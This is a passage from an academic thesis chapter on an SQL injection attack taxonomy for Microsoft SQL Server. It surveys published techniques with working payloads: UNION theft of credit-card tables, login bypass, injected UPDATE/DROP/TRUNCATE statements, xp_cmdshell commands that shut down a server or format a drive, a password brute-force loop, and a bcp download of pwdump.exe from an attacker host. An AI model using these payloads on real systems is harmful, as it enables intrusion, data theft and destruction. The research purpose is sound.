different types of attacks. This constitutes a deductive approach and therefore it is
a typical case of experimentation.
>
OBJECTIVE IV
PERFORM EXPERIMENTATION AND ULTIMATELY ANSWER TO THE RESEARCH QUESTION
The purpose of this objective is to build some internal validity. A mixture of
literature review, know-how and recently gained experience will be the key factors
when conducting experimentation on a real system. The results of the actual tests
will then be analysed using a mere yes/no positivistic approach.
>
OBJECTIVE V
BASED ON THE GAINED EXPERIENCE, PROPOSE SIMPLE FIRST LINE DEFENSIVE TECHNIQUES
Likewise Objective IV, this objective will heavily rely on literature review, know-how
and recently gained experience as a means for proposing a set of first line
defensive techniques.

Chapter 4
ATTACK TAXONOMY
Taxonomy refers to either a hierarchical classification of things, or the
principles underlying the classification. Almost anything,
animate or inanimate objects, places, and events, may be
classified according to some taxonomic scheme. Some
have argued that the human mind naturally organizes its
knowledge of the world in a taxonomic fashion.
This chapter sets out to define a scheme that partitions a body of Knowledge
and defines the relationships among its pieces in order to streamline the
classification and understanding of the SQL Injection threat. The chapter divides
into two sections, one containing a representative ad-hoc survey of existing
techniques which will form the basis for the second section, the formulation of
the taxonomy.

attack taxonomy •
SURVEY OF TECHNIQUES
Taxonomies are all about hierarchical classification and partitioning of a body of
Knowledge. This implies that Knowledge must already be present for a taxonomy to be
formulated. Rather than posing as a means for producing Knowledge, taxonomies offer
a structured way to scrutinize a reality and a means to leverage the formulation of novel
Knowledge. For this matter it is necessary to perform a survey of the existing techniques.
Since at present time no taxonomy has been attempted, this survey will inevitably be
somewhat ad-hoc. On the other hand, it cannot be a blind dump of all the samples the
researcher laid his hands on as such practice would most certainly be rendered as
unproductive. Therefore the researcher will play an important role in dissecting the value
of some approaches and determine which contribute to the formulation of the
taxonomy. In order to minimize the entropy of the survey and build some breakdown
structure Landsmann’s & Strömberg’s (2003) list of attack steps will be used as a
navigation beacon for the ad-hoc survey. They propose six steps attackers may combine
iteratively in the attack in order to fulfil their objectives. These are herein transcript:
• Setting the objective – Whether explicit or arbitrary, attackers have one or more
objectives for conducting SQL Injection attacks. A concrete example might be
that an attacker wants to access the Web application in order to obtain
information about a corporation’s customers. This is an attack on the security
service confidentiality;
• Choosing the method – In some cases, the attacker is only interested in gaining
access to the Web application and therefore tries to bypass authentication. In
other cases, bypassing authentication is only one step before he can try to
reach his objectives. Hence, several methods can be chosen;

attack taxonomy •
• Examining prerequisites – In order to determine if the objectives can be
reached, the attacker systematically checks which prerequisites are supported.
Prerequisites may be necessary conditions for a given attack method, or make
the attack easier to conduct;
• Testing for vulnerabilities – The attacker begins testing for vulnerabilities to
exploit, e.g. experimenting with input validation by entering single quotes,
enumerating privileges or evaluating returned information;
• Choosing means – Depending on supported prerequisites and found
vulnerabilities, the attacker chooses his means for the attack;
• Designing the query – The query designed by the attacker needs to follow the
proper structure of a SQL query expected by the RDBMS. If not, syntax errors
are generated and potentially displayed in error messages. One example of
syntax errors relates to quotation marks, i.e. if SQL Injection is possible without
escaping them. Another example is if parentheses are used in the underlying
query. Depending on the objective, other syntax errors that concern
information retrieval of database structure may have to be overridden.
Examples of such errors include table names, column names, number of
columns and data types.
This survey of existing techniques will inevitably refer to code samples and use cases that
due to their nature can be used to depict a representative variation of the six iterative
steps herein presented.

attack taxonomy •
4 Setting the Objective
Setting the objective of the attack is somewhat an implicit prerequisite for the whole
attack lifecycle. Nonetheless, it is an important step worthy to be mentioned as it sets out
the action plan for the attack. If little or nothing can be systemized in regards to the
underlying motivation of the offender for perpetrating the attack, the attack will
undoubtly affect at least one information asset by compromising one or more security
services. Literature refers the following list as the main security services affected by SQL
Injection (Álvarez & Petrovic 2003;Huang et al. 2004;Landsmann & Strömberg
2003;Yuhanna 2003):
• Access Control – involves ensuring that users can only access and manipulate
data and perform operations according to their privileges;
• Availability – indicates that the services offered by a network resource such as a
Web application must be available to users when they request them;
• Authenticity – deals with ensuring that users who use a network resource such
as a Web application are who they claim to be;
• Confidentiality – deals with ensuring that information is kept secret. This
security service can be divided into privacy and secrecy;
• Privacy – indicates that information assets such as personal information,
concerning employees and customers must be kept secret;
• Secrecy – states that sensitive business-related information must be kept secret;
• Integrity - information consistency must be maintained;
• Auditability – also known as chain-of-custody. All changes performed on an
information asset must be traced, typically by means of a log.

attack taxonomy •
4 Choosing the Method
Pretty much like in research, choosing a collection of methods will serve to address the
objectives previously set-out. Once the collection of objectives is established and the list of
security services formulated, the attacker must then choose the tools of his trade, the
weapons for the duel. These attack methods can vary in infinite ways as there are
unlimited variations of SQL Injection attacks (Álvarez & Petrovic 2003), still, it is possible
to break them down into action-type categories. These atomic categories can then be
used in building a consolidated strategy for implementing the means to perpetrate an
attack and fulfil at least one of the objectives. The commonality across attack methods is
the fact they rely on two factors: a base legitimate query is used as a carrier wave for a
piggy-backed malicious statement (Anley 2002b;Kost 2003;Sam M.S. 2005), and
injection attacks strictly rely on the SQL dialect implemented by the underlying RDBMS
(Anley 2002b;Halfond & Orso 2005a;Halfond & Orso 2005b;Livshits & S.Lam 2005).
4Data Manipulation
Data manipulation can potentially extend to the full DML (Data Manipulation Language)
stack depending on a number of factors. For example, if the least privilege principle is
being applied by the sysadmin, this would reduce the chances of illegitimate access and
limit the scope of accessible DML statements. Data manipulation deals with the possibility
to retrieve, change, fabricate or delete data in a database through the use SQL
commands.
As an example, let’s assume the following base query is the legitimate carrier wave used
on a page that takes user input in order to find a list of products:
Select * From Products Where Description Like '%<user input>%'

attack taxonomy •
Suppose the following T-SQL script was inserted on the product search textbox:
There is a base query that will try to find a product containing the “xads@233ª~ºs2”
string on its description but also a second query piggy-backed on the first by means of a
UNION operator. This second query will only be executed if the structure of its resultset13
matches exactly the structure of the primary query, or the primary query does not
produce any results. Finally, the remaining piece of the base query, the “%’” portion is
ignored by means of a comment sign “--”. Because it is very much unlikely that there is a
product with a description containing “xads@233ª~ºs2”, the base query will return
empty. Then the piggy-backed query is executed and its results yielded to the first query.
If true that the hacker must be aware of the existence of a table named
[CreditCardNumbers], there are other statements, such as the DDL (Data Definition
Language) stack, that can be used to reveal the inner structure of a database or even of a
RDBMS.
4Authentication Bypass
An attacker may use this method to pretend to be a legitimate user by bypassing an
authorization mechanism and be granted authentication privileges. Consider the
following ASP.NET code-behind script excerpt written in VB.NET in order to authenticate
a user who fills in a page containing a login and a password textbox (Spett 2002):
13
The resultset is a tabular view of the results yielded by a query. Each column has a name and a data type.
xads@233ª~ºs2'
UNION ALL
Select * from CreditCardNumbers --

attack taxonomy •
Here is what happens when a user submits a username and password. The query will go
through the [Users] table to see if there is a row where the username and password in
the row match those supplied by the user. If such a row is found, the boolAuthenticated
variable is set to true, whereas if there is no row that the user-supplied data matches, the
boolAuthenticated variable will remain false and the user will not be authenticated. If no
character validation is performed on strUsername and strPassword, an attacker could
modify the actual SQL query structure so that a valid name will be returned by the query
even if he did not know a valid username or a password. If the attacker used this for
login and password:
The base query would evaluate to:
Instead of comparing the user-supplied data with that present in the [Users] table, the
query compares '' (empty) to '' (empty), which will always return true. Since all of the
qualifying conditions in the WHERE clause are now met, the query will yield a value
greater than zero.
SELECT Count(*) FROM Users WHERE
Username='' OR ''='' AND Password = '' OR ''=''
' OR ''='
Dim myCommand As System.Data.SqlClient.SqlCommand("", myConnection)
myCommand.CommandText = "SELECT Count(*) FROM Users WHERE Username='" & _
Request.Params("strUsername") & _
"' AND Password = '" & _
Request.Params("strPassword") & "'"
Dim boolAuthenticated As Boolean = False
If myCommand.ExecuteScalar() <> 0 Then
boolAuthenticated = True
End If

attack taxonomy •
4Information Retrieval
According to Landsmann & Strömberg (2003), attackers can try to manipulate or execute
SELECT statements in order to get access to information beyond their privileges. This
could be achieved by e.g. manipulating the WHERE clause. One example of this is that
more rows than intended can be retrieved from the table specified in the original query.
Another example is by using UNION, causing rows from more tables to be returned than
specified in the original query as in a previous example.
Consider the following base query used on an Internet page that takes user input in order
to find a list of products, but that this e-Commerce frontend is also used as an Extranet,
so that prices vary according to the type of customer:
Suppose the following T-SQL script was inserted on the product search textbox:
It does look simple, yet, without knowing a thing about the database structure, it was
possible to get rid of the database clause that limited the user to access products only
meant for privileged customers.
4Information Manipulation
Attackers can try to manipulate or execute UPDATE statements in order to alter
information beyond their privileges (Landsmann & Strömberg 2003). Let’s consider the
previous example where the user is searching for a product based on its description.
Select * From Products Where Description Like '%<user input>%' and
isGoldCustomer=0
Digital%Photo%Camera' --

attack taxonomy •
If the following T-SQL script was inserted on the product search textbox:
The resulting query would be equal to:
The “;” enables to execute a second query and the “--“ comment sign to discard the
closing single quotation mark of the first query. The second query could then be used to
lower the price of a particular product to a more affordable figure.
4Information Fabrication
Attackers can try to manipulate or execute INSERT statements in order to alter
information beyond their privileges (Landsmann & Strömberg 2003). Let’s consider the
previous example presented in the Authentication Bypass section where the backend
Web application performed a row count to determine if the user has supplied valid
credentials. Suppose the Web application was a bit more intelligent and actually retrieved
user information in order to use across all the pages, for example, by means of a cookie.
In this case, the previous attack method would not succeed. Fabricating a new user
would come in handy and then it would be a matter of using real and valid credentials.
This could be achieved by means of an insert statement piggy-backed on the first query,
and it would be only a matter of introducing the following script for username:
';Insert Into Users (username, password) values ('hacker','hacked') --
Select * from Products where Description Like '';
Update Products set Price=1 Where Description Like '%Digital%Camera%' -- '
';
Update Products set Price=1 Where Description Like '%Digital%Camera%' --

attack taxonomy •
4Information Deletion
Attackers can try to manipulate or execute DELETE or DROP statements in order to alter
information beyond their privileges (Landsmann & Strömberg 2003). For example, the
following piggy-back statement would drop the logging table:
This would wipe out all the purchase requests without any trace:
And this would delete a specific user and maybe erase any evidence that a user had been
maliciously created on a previous occasion:
4Extending to Other Data Sources with OleDb
The attack methods presented to this point only aimed at data stored on the RDBMS that
is supporting a database-driven application. But the scope of the attack could very well
expand beyond the initial RDBMS and target other data sources.
Most data sources, and not just RDBMSs, implement ODBC or OleDb. These are
standardised interfaces, or middleware, for accessing a database from a program,
providing an abstraction layer between the RDBMS and the consumer application. It is
safe to say any commercial RDBMS implements at least one of these interfaces, if not
both. From a consumer’s perspective, ODBC can be consumed by OleDb using a specific
';Delete from Users Where UserName='hacker' --
';Truncate Table PurchaseRequests --
';Drop Table TransctionsLogging --

attack taxonomy •
provider called OleDb provider for ODBC data sources, so if a consumer application can
consume OldDb, it implicitly consumes ODBC as well. This abstraction layer allowed
interoperating different data sources from different vendors, and orchestrate distributed
queries across several systems. The following list contains the most commonly
ODBC/OleDb compliant data source providers installed by default on Windows systems,
or easily accessible and installed by non-technical users:
• Text file;
• Microsoft Access;
• Microsoft Dbase;
• Microsoft Excel;
• Microsoft Paradox;
• Microsoft Visual FoxPro;
• Microsoft SQL Server;
• Microsoft SQL Server Analysis Services ;
• Oracle ODBC Provider;
• IBM DB2;
• Microsoft Active Directory.
These data sources, amongst others, could participate in a distributed query triggered by
the RDBMS that is being manipulated with SQL Injection. More interesting is the fact that
a great deal of these providers does not belong to a RDBMS but to applications.
Microsoft SQL Server’s known flexibility (Cerrudo 2002) allows to take advantage of
OleDb data sources by means of OPENROWSET and OPENQUERY.

attack taxonomy •
>
MICROSOFT SQL SERVER DATABASES
Accessing remote databases hosted on a MS SQL Server system could be achieved
by invoking the OPENROWSET function and using the corresponding SQL Server
OleDb Provider. The following example will connect to a remote SQL Server and
retrieve its version. Other, more pervasive statements, could also be injected:
This example requires knowledge about the credentials for connecting to the
remote server, nonetheless, these could be omitted and the network credentials
used to establish a foothold on the first RDBMS could be propagated onto the
second RDBMS. This result would be achieved simply by removing the username
and password piece from within the query. Typically, within a corporate network
environment based on Windows, this would be a domain account stored on the
Active Directory (see Figure 22 - The Four Points of Authentication of a
Database-Enabled Remote Web Request on page 91 and Figure 24 - User vs.
Account Impersonation on a Web Application on page 92).
Anley (2002a) proposed a brute-force method for those cases when the same
network credentials cannot be used to connect to the remote RDBMS. According
to him, «since this OPENROWSET authentication is instant, and involves no
timeout in the case of an unsuccessful authentication attempt, it is possible to
inject a script that will brute-force the “sa” password, using the server's own
processing power. The xp_execresultset method must be used for this, since it
allows many unsuccessful authentication attempts to be executed in a WHILE
loop». He also includes a MS SQL 2000 T-SQL script to do the trick:
exec sp_executesql N'select * from OPENROWSET
(''SQLOLEDB'',''remoteServer.net'';''sa'';''password'',''select
@@version'')'

attack taxonomy •
There is one particular case of accessing remote data sources and that is when the
sysadmin has created what is called a “Linked Server”. Linked servers are static
connections to other OleDb compliant data sources, containing connection
information such as the remote logon credentials, and exposed to the RDBMS as
an easy-to-use alias. If the attacker is lucky, using DDL statements it would be
possible to determine which linked servers were configured and exploit them as
well.
>
MICROSOFT ACTIVE DIRECTORY
Microsoft Active Directory, AD for short, is what enables user management on a
Windows-based network environment. It authenticates network users and
describes the organization by means of an LDAP-based directory. Though it is
more an application than a database, it exposes an OleDb provider for
interoperating with other data sources. So if a client application needed to search
for a network user, the AD could be queried as if it were a simple database, using
SELECT statements and a WHERE clauses as in the following example:
declare @username nvarchar(4000), @query nvarchar(4000)
declare @pwd nvarchar(4000), @char_set nvarchar(4000)
declare @pwd_len int, @i int, @c char
select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789!_'
select @pwd_len = 8
select @username = 'sa'
while @i < @pwd_len begin
-- make pwd
(code deleted)
-- try a login
select @query = N'select * from OPENROWSET(''MSDASQL'',''DRIVER=(Cerrudo
2002);SERVER=;uid=' + @username + N';pwd=' + @pwd + N''',''select
@@version'')'
exec xp_execresultset @query, N'master'
--check for success
(code deleted)
-- increment the password
(code deleted)
end

attack taxonomy •
In order to execute this query against the AD from within the RDBMS, it is
necessary to use the AD OleDb provider, whether explicitly by means of the
OPENROWSET or OPENQUERY functions containing the OleDb provider, or
implicitly by means of a linked server. On the following set of examples, a linked
server is created and then a variety of AD operations is performed:
-- Modify the following queries to point to an OU in your Active
Directory hierarchy
-- Add a linked server for the Active Directory
exec sp_addlinkedserver 'ADSI', 'Active Directory Services 2.5',
'ADsDSOObject', 'adsdatasource'
-- Query for a list of Contact entries in an OU using the LDAP query
dialect
select convert(varchar(50), [Name]) as FullName,
convert(varchar(50), Title) as Title
from openquery(ADSI,
'<LDAP://OU=Directors,OU=Atlanta,OU=Intellinet,DC=vizability,
DC=intellinet,DC=com>;
(objectClass=Contact);Name,Title;subtree')
-- Query for a list of User entries in an OU using the SQL query dialect
select convert(varchar(50), [Name]) as FullName,
convert(varchar(50), Title) as Title,
convert(varchar(50), TelephoneNumber) as PhoneNumber
'select Name, Title, TelephoneNumber
from
''LDAP://OU=Directors,OU=Atlanta,OU=Intellinet,DC=vizability,
DC=intellinet,DC=com''
where objectClass = ''User''')
-- Query for a list of Group entries in an OU using the SQL query
dialect
select convert(varchar(50), [Name]) as GroupName,
convert(varchar(50), [Description]) GroupDescription
'select Name, Description
from ''LDAP://OU=VizAbility
Groups,DC=vizability,DC=intellinet,DC=com''
where objectClass = ''Group''')
Select adspath,samAccountName from 'LDAP://OU=PoC,DC=k2mega,DC=local'
Where objectClass='user' and DisplayName='hacker'

attack taxonomy •
The authentication mechanism for interfacing with the AD herein used is
Windows Integrated Authentication, meaning the network credentials used for
authenticating against the primary RDBMS, the one under attack, will be
propagated to reach the AD, hence the RDBMS is used as a Trojan horse. This is
the typical network deployment scenario as Microsoft endorses that Windows
integrated authentication is to be used whenever possible (Microsoft 6 A.D.b).
Figure 26 - Microsoft’s Endorsement of Windows Authentication
> adapted from (Microsoft 6 A.D.a) <
The queries shown on this example are standard AD queries anyone could execute
provided the necessary context changes. Piggy-backing these queries on a carrier
query, the modus operandis of SQL Injection, is only a matter of syntax, by no
means different from the simple examples shown previously.
The potential of interfacing with the applicational piece that centralizes the
authentication management of the entire corporate network resources from
within the RDBMS is enormous from a hacker’s perspective. Depending on the
policies adopted by the IT operations team and the principles upheld by the
software vendors and systems integrators, e.g. the least privilege, the secure by
default principle, etc., it is very much possible to create a user on the corporate
network system directory and legitimately access network resources using a valid
account. All that only with a simple textbox on a Web page!

attack taxonomy •
>
MICROSOFT EXCHANGE
Microsoft Exchange is the materialization of Microsoft’s view for corporate
messaging and an important part on their overall strategy for enterprise
collaboration. MS Exchange, the server component, and MS Outlook, the client
piece, play an important role in contemporary organizations as they constitute a
key enabler of the information worker empowerment. Likewise the AD, the
Exchange environment is a tempting target because of its corporate-wide role and
dominant market share.
Figure 27 - Corporate Messaging Software, IB Market Share, 2005
> adapted from (The Radicati Group 2006) <
Like other applications, Exchange allows OleDb connection through the use of a
specific provider. Once there is an OleDb provider, then interfacing with it from a
RDBMS is seamless, apart from the inherent specificness of the application’s
information structure. Again, if the organization fails to implement a strong set of
principles and policies, the Exchange platform could be compromised through the
use of a SQL Injection attack occurring on a RDBMS sitting on the network (see
Figure 6 - Typical Web Infrastructure Layout on page 34). The following examples
show a number of operations performed on Exchange via a MS SQL Server:
MS Exchange
57%
IBM Lotus Domino
35%
IBM Lotus Workplace
2%
Others
6%

attack taxonomy •
-- Add a linked server for the Exchange 2000 PF store
exec sp_addlinkedserver 'E2K_PF', 'Exchange OLE DB provider',
'exoledb.DataSource.1',
'file:.backofficestoragevizability.intellinet.compublic folders'
-- Query for a list of Contact entries in a PF
select convert(varchar(50), "urn:schemas:contacts:sn") as LastName,
convert(varchar(50), "urn:schemas:contacts:givenName") as
FirstName
from openquery(E2K_PF,
'select "urn:schemas:contacts:sn",
"urn:schemas:contacts:givenName"
from scope(''shallow traversal of
".IntellinetAtlantaAtlanta Contacts"'')')
-- Query for a list of appointment Calendar entries in a PF
select convert(varchar(50), "urn:schemas:httpmail:subject") as
Subject,
convert(varchar(50), "urn:schemas:calendar:dtstart") as
StartDate
'select "urn:schemas:httpmail:subject",
"urn:schemas:calendar:dtstart"
".IntellinetAtlantaAtlanta Events"'')
where "urn:schemas:calendar:alldayevent" = TRUE')
order by Subject, StartDate
-- Query for a list of all-day-event Calendar entries in a PF
Subject,
StartDate
".IntellinetAtlantaAtlanta Events"'')
where "urn:schemas:calendar:alldayevent" = FALSE')
order by Subject, StartDate
-- Querying a Mailbox
-- Add a linked server for the Exchange 2000 mailbox
exec sp_addlinkedserver 'E2K_Administrator', 'Exchange OLE DB provider',
'exoledb.DataSource.1',
'file:.backofficestoragevizability.intellinet.comMBXAdministrator'
-- Query for a list of appointment Calendar entries in the mailbox
AppointmentName,
StartDate
from openquery(E2K_Administrator,
from scope(''shallow traversal of ".Calendar"'')
where "urn:schemas:calendar:alldayevent" = FALSE')

attack taxonomy •
4Extending Beyond the RDBMS by Using Command Execution
Landsmann & Strömberg (2003) describe command execution as being «a method that
enables an attacker to execute SQL specific system commands through the RDBMS and
may even allow the attacker to take control over other host computers in the network».
The attacker can call system procedures that come with the RDBMS, or try to call stored
procedures that have been tailored by system developers, database administrators or
application programmers for the any application.
Executing operating system commands is generally done through the use of
xp_cmdshell, a built-in extended stored procedure that allows the execution of arbitrary
command lines. Anley (2002a) defines extended stored procedures as being «essentially
compiled Dynamic Link Libraries (DLLs) (…) to allow SQL Server applications to have
access to the full power of C/C++, and are an extremely useful feature. A number of
extended stored procedures are built in to SQL Server, and perform various functions such
as sending email and interacting with the registry». Let’s consider some examples:
This sample code will display all files on the root of the C drive:
This sample code will shutdown the server:
This sample code will create a VBScript file on the root of the C drive:
Exec Master..xp_cmdshell 'shutdown /s /f'
Exec Master..xp_cmdshell 'echo WScript.Echo "this could be used to create a
user or escalating privileges" > C:script.vbs'
Exec Master..xp_cmdshell 'Dir C:'

attack taxonomy •
But there are other interesting extended stored procedures that can tamper with the
operating system. Playing with the registry is one of those methods which can be
achieved by a set of built-in extended stored procedures named xp_regXXX functions:
• xp_regaddmultistring;
• xp_regdeletekey;
• xp_regdeletevalue;
• xp_regenumkeys;
• xp_regenumvalues;
• xp_regread;
• xp_regremovemultistring;
• xp_regwrite.
The following example will reveal all of the SNMP communities configured on the server.
Holding this information would enable an attacker to reconfigure network appliances in
the same area of the network, because SNMP communities tend to be infrequently
changed, and shared among many hosts (Anley 2002b):
There are many other interesting extended stored procedures available which could
directly or indirectly be used to affect the operating system hosting the RDBMS. The
following table mentions just a few worthy to look at:
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
'SYSTEMCurrentControlSetServicessnmpparametersvalidcommunities'

attack taxonomy •
Name Description
xp_availablemedia Reveals the available drives on the machine
xp_dirtree Allows a directory tree to be obtained
xp_enumdsn Enumerates ODBC data sources on the server
xp_loginconfig Reveals information about the security mode of the server.
xp_makecab Allows the user to create a compressed archive of files on the
server (or any files the server can access)
xp_ntsec_enumdomains Enumerates Windows domains that the server can access
xp_OAxxx
Enables consuming all ActiveX objects available to the
operating system, which virtually allows to perform any
operation anyone could think of
xp_servicecontrol Allows a user to start, stop, pause and resume services
xp_terminate_process Terminates a process, given its process id (PID)
Table 2 - Handy Extended Stored Procedures in MS SQL Server 2000
> adapted from (Anley 2002b) <
4Uploading Files
Once an attacker has gained adequate privileges on the SQL Server, he may desire to
upload files to the server. Using the xp_cmdshell extended stored procedure it is possible
to create a text-based file, such as a VBScript. However, binary files such as executables
cannot be created in that fashion and must be uploaded. Since this cannot be done
using protocols such as SMB, the Windows protocol for network sharing, since port 137-

attack taxonomy •
139 typically is blocked at the firewall, the attacker will need another method of getting
the binaries onto the victim’s file system. This can be done by uploading a binary file into
a table local to the attacker and then pulling the data to the victim’s file system using a
SQL Server connection (Cerrudo 2002).
Cerrudo (2002) proposes a clever approach to achieve this result. The process begins by
creating a table on the local server as follows:
Then, the attacker would then upload the binary into the table as follows:
The binary can then be downloaded to the victim server from the attacker’s server by
running the following SQL statement on the victim server:
This statement will issue an outbound connection to the attacker’s server and write the
results of the query into a file recreating the executable. In this case, the connection will
be made using the default protocol and port which could likely be blocked by the
firewall. To circumvent the firewall, the attacker could try:
exec xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftMSSQLServerClientConnectTo',
'HackerSrvAlias','REG_SZ','DBMSSOCN,hackersip,80'
exec xp_cmdshell 'bcp "select * from
AttackerTable" queryout
pwdump.exe -c -Craw -Shackersip -Usa -Ph8ck3r'
bulk insert AttackerTable from 'pwdump.exe'
with (codepage='RAW')
create table AttackerTable (data text)

attack taxonomy •
And then:
The first SQL statement will configure a connection to the hacker’s server over port 80
while the second SQL statement will connect to the hacker’s server using port 80 and
download the binary file.
This method for uploading files uses many of the concepts described before and in reality
there is no limit for how complex it may get. Once the objectives are set-out, then it is
only a matter of craftsmanship to come up with a set of attack methods that can serve
the intended purposes.
4 Examining Prerequisites
Just by analysing the list of attack methods presented, it is possible to determine that
different SQL Injection attack methods have different prerequisites in order to be
carried-out. These can be related to query execution properties, or specific features
embedded on the RDBMS, or even the topology of the surrounding corporate network
environment. SQL Injection as a whole also depends on two prerequisites already pointed
out earlier: a carrier query is required in order to piggy-back malicious statements, and
injection attacks depend on the SQL dialect implemented by the underlying RDBMS.
Hence, prerequisites play an important role in the attack lifecycle. But the real issue
behind prerequisites is not if SQL Injection would be possible, but rather how easily this
task could be achieved (Landsmann & Strömberg 2003). Examining prerequisites will
serve to refine the choosing of attack methods and align their specific implementation
with the context of the IT environment under attack.
exec xp_cmdshell 'bcp "select * from AttackerTable" queryout pwdump.exe -c -Craw
-SHackerSrvAlias -Usa -Ph8ck3r'

attack taxonomy •
4Subqueries
Sub-querying enables nesting of SQL statements and can offer a good alternative for
INNER JOINing ultra-large tables as such procedure introduces a major performance
penalty. Many Transact-SQL statements that include subqueries can be alternatively
formulated as joins. Other questions can be posed only with subqueries (Microsoft
2006). Subqueries are achieved at the expense of sub-selects which are nothing more
than multiple SELECT statements used together. A top-level SELECT statement uses other
lower-level statements to retrieve values to be used in a WHERE clause, e.g.:
From a hacking perspective, sub-querying could offer the means to piggy-back a second
malicious query onto the carrier query. Let’s consider a previous example where the
following base query is the legitimate carrier wave used on a page that takes user input
in order to find a list of products:
The hacker could manipulate the query into updating one record, for example, on a
remote data source, using a sub-select as in the following example after injection:
Select * From Products Where Description Like '%' and exists
(
select * from OPENROWSET('SQLOLEDB','remoteServer.Net';;,'select * from
AdventureWorks2000.dbo.Product Update AdventureWorks2000.dbo.product set
ListPrice=1 where [name]=''Digital Camera''')
) -- %'
Select * from PurchaseOrderDetail where PurchaseOrderID in
(
Select PurchaseOrderID from PurchaseOrderHeader
Where ShipDate > dateadd(d,-2,getdate()) and Status=1
)
Select * From Products Where Description Like '%<user input>%'

attack taxonomy •
4JOIN
The JOIN clause enables to combine information from multiple tables, including tables
from external data sources, and yield a consolidated resultset. Joins can be categorized as
(Microsoft 2006):
• Inner joins – the typical join operation, which uses some comparison operator
like = or <>). These include equi-joins and natural joins. Inner joins use a
comparison operator to match rows from two tables based on the values in
common columns from each table. For example, retrieving all rows where the
student identification number is the same in both the students and courses
tables;
• Outer joins – can be a left, a right, or full outer join. Outer joins are specified
with one of the following sets of keywords when they are specified in the
FROM clause:
Ø LEFT JOIN or LEFT OUTER JOIN
The result set of a left outer join includes all the rows from the left table
specified in the LEFT OUTER clause, not just the ones in which the joined
columns match. When a row in the left table has no matching rows in the
right table, the associated result set row contains null values for all select list
columns coming from the right table;
Ø RIGHT JOIN or RIGHT OUTER JOIN
A right outer join is the reverse of a left outer join. All rows from the right
table are returned. Null values are returned for the left table any time a right
table row has no matching row in the left table;

attack taxonomy •
Ø FULL JOIN or FULL OUTER JOIN
A full outer join returns all rows in both the left and right tables. Any time a
row has no match in the other table, the select list columns from the other
table contain null values. When there is a match between the tables, the
entire result set row contains data values from the base tables;
• Cross joins – return all rows from the left table. Each row from the left table is
combined with all rows from the right table. Cross joins are also called
Cartesian products.
From a hacking perspective, JOINs can provide the means to access unintended
information sources and combine them on a single resultset.
4UNION
The UNION logical operator is probably one of the most powerful techniques for
combining information sources as it can be used to combine multiple resultsets from
multiple SELECT queries into a single consolidated resultset. Let’s consider the above
mentioned example of a carrier wave used on a page that takes user input in order to
find a list of products. The hacker could manipulate the query into returning additional
products, for example, held on a remote data source, using the UNION operator as in the
following example after injection:
Select * From Products Where Description Like '%'
UNION ALL
select * from OPENROWSET('SQLOLEDB','remoteServer.Net';;,'select * from
AdventureWorks2000.dbo.Product')
-- %'

attack taxonomy •
4Multiple Statements
Multiple statements refers to the ability of allowing the execution of multiple SQL
statements, where each statement is separated by a delimiter, e.g. a semicolon or the GO
separator. If in the product search example, the hacker typed in
then another second statement would be carried-out after the first causing the D drive, if
existing, to be formatted. Instead of using the semicolon, the GO separator would have
the very same effect.
4Comments
Many of the examples herein shown depend on “--”, SQL’s comment sign, at the end of
the query in order to discard the carrier query’s closing single quotation mark. The ability
to comment out parts of an SQL statement, meaning that the RDBMS will not take
notice of the SQL syntax followed by a comment symbol, will provide for syntax
consistency after the carrier query has been injected.
4Error Messages
Error messages can provide invaluable information about a system’s inner structures and
information if an injection attack is having progress, especially if error messages are
propagated all the way to the Web page. These can be raised by the RDBMS or in any
server-side script or program, or even by the injection itself as a means for outputting
information. The relevance of printed-out error messages was neatly demonstrated on
the «Real Environment Test» shown on the Experimenting chapter.
'; exec Master..xp_cmdshell 'format D: /q' --

attack taxonomy •
4Implicit Type Casting
Implicit type casting can happen at the RDBMS level as well at the business layer level (see
Figure 8 - Classic Three-Tier Web Architecture Model on page 40). For example, several
RDBMSs support variable type conversion, allowing numeric values to be converted
automatically into a string type. For MS SQL Server, «implicit conversions are those
conversions that occur without specifying either the CAST or CONVERT function. Explicit
conversions are those conversions that require the CAST or CONVERT function to be
specified» (Microsoft 2006). An attacker could use type casting to his advantage and fool
the application and the underlying RDBMS. The following table shows all explicit and
implicit data type conversions that are allowed in MS SQL Server 2005:
Table 3 - Explicit and Implicit Type Conversions in MS SQL Server 2005
> adapted from (Microsoft 2006) <

attack taxonomy •
4Variable Morphism
Variable morphism is closely related to implicit type casting, but it differs on a crucial
point. Whereas in implicit casting a variable’s type remains unaltered as it is strong-typed,
when variables allow morphism, instead of casting the value to the variable’s type, the
type of the variable changes to accommodate the type of the value. These types of
variables are also known as weak-typed are commonplace across several script and
programming languages used in Web application development. Variable morphism can
be described as variables that can store data of arbitrary type. One good example is
VBScript’s variant type shown in this example:
Variable morphism can come in quite handy when manipulating numeric values.
Suppose that on a Web page there is a grid displaying a list of products where the
resultset yielded by a query that received user input for performing a product search on
the database is rendered. It is very common to find implementations where the user is
expected to click the desired product to navigate to a page containing more detailed
information on that product. Quite often, the HTML link contains an explicit reference to
the product table primary key used for uniquely identifying the product, e.g.:
Dim myVariable 'type still to be defined
myVariable = 32000
'It is now of type integer
myVariable = True
'It is now of type boolean
myVariable = "some text"
'It is now of type string
myVariable = "2006-01-01"
'It is still of type string
myVariable = CDate(myVariable)
'It is now of type Date thanks
'to an explicit conversion

attack taxonomy •
Figure 28 - Primary Key Information Exchanged via URL Querystring
This example demonstrates that behaviour as the mouse hovers a particular product, the
link on the status bar contains an explicit reference to the uniquely identifier of the
product which will be passed onto a page named “ListProductSpecs.asp”. In such cases
of numeric values, tampering with the carrier query is fairly simple. Typically, the
implementation of the ASP page would look similar to this:
Since the PrdID variable is not strong-typed, it could very well host a string type value,
hence simplifying the attacker’s life as he no longer has to worry about unclosed single
Dim PrdID, myQuery
PrdID = request.querystring("ProductID")
myQuery = "Select * from ProductSpecs Where ProductID=" & PrdID

attack taxonomy •
quotation marks from the carrier query. All it would take to inject another statement
would be something to this:
This example could also be successful if the application enforced strong-types, such as a
Web application developed in C# using the ASP.NET 2.0 Framework. Although the
database expects an integer value for referencing the product, from within the Web
application a string-based SQL statement has to be built. Because of this fact, the Web
application will most certainly read the ProductID parameter as a string, thus enabling the
hacker to exploit this fact and forget all about escaping the single quotation marks of the
carrier query since there aren’t any. Numeric fields are therefore excellent entrypoints for
testing SQL Injection.
4Stored Procedures
Most of the examples shown while describing different attack methods relied on stored
procedures, namely, system stored procedures. Such procedures, supported by all
commercial RDBMSs, allow execution of system or database commands and SQL
